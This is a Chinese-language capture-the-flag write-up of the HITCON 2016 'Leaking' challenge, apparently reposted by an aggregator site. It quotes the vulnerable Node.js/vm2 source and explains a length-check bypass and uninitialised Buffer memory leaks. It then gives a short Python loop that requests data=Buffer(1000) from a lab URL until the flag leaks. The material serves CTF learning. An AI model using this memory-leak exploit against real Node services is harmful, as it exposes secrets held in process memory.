[HITCON 2016]Leaking沙箱逃逸學習

node.js 里提供了 vm 模塊，相當于一個虛擬機，可以讓你在執行代碼時候隔離當前的執行環境，避免被惡意代碼攻擊。但是這道題比較有意思

考點是：

node.js中VM2沙箱逃逸

JS通過Buffer 類處理二進制數據的緩沖區

首先給出了題目的源碼

"use strict";var randomstring = require("randomstring"); var express = require("express"); var {VM } = require("vm2"); var fs = require("fs");var app = express(); var flag = require("./config.js").flagapp.get("/", function(req, res) {res.header("Content-Type", "text/plain");/* Orange is so kind so he put the flag here. But if you can guess correctly :P */eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";")if (req.query.data && req.query.data.length <= 12) {var vm = new VM({timeout: 1000});console.log(req.query.data);res.send("eval ->" + vm.run(req.query.data));} else {res.send(fs.readFileSync(__filename).toString());} });app.listen(3000, function() {console.log("listening on port 3000!"); });

我們把關鍵幾行代碼列出來

eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";") eval就是把里面的當作javascript語句來運行 var vm = new VM({timeout: 1000});console.log(req.query.data);res.send("eval ->" + vm.run(req.query.data)); 然后要Get傳遞一個data參數，將它放在vm2創建的沙盒中運行，并且對傳入的參數長度進行了限制，不超過12，這里可以用數組繞過

解題所需知識

在較早一點的node.js版本中 (8.0 之前)，當 Buffer 的構造函數傳入數字時, 會得到與數字長度一致的一個 Buffer，并且這個 Buffer 是未清零的。8.0 之后的版本可以通過另一個函數 Buffer.allocUnsafe(size) 來獲得未清空的內存。

如果使用new Buffer(size)或其別名Buffer(size)）創建,則對象不會填充零,而只要是調用過的變量，一定會存在內存中，所以需要使用Buffer()來讀取內存，使用data=Buffer(1000)分配一個1000的單位為8位字節的buffer，因此很容易得到姿勢

import requests url = 'http://bcd330df-99ca-4b90-a33c-1cca550c2d15.node3.buuoj.cn/?data=Buffer(1000)' response = '' while 'flag' not in response:req = requests.get(url)response = req.textprint(req.status_code)if 'flag{' in response:print(response)break

總結

以上是生活随笔為你收集整理的[HITCON 2016]Leaking沙箱逃逸学习的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。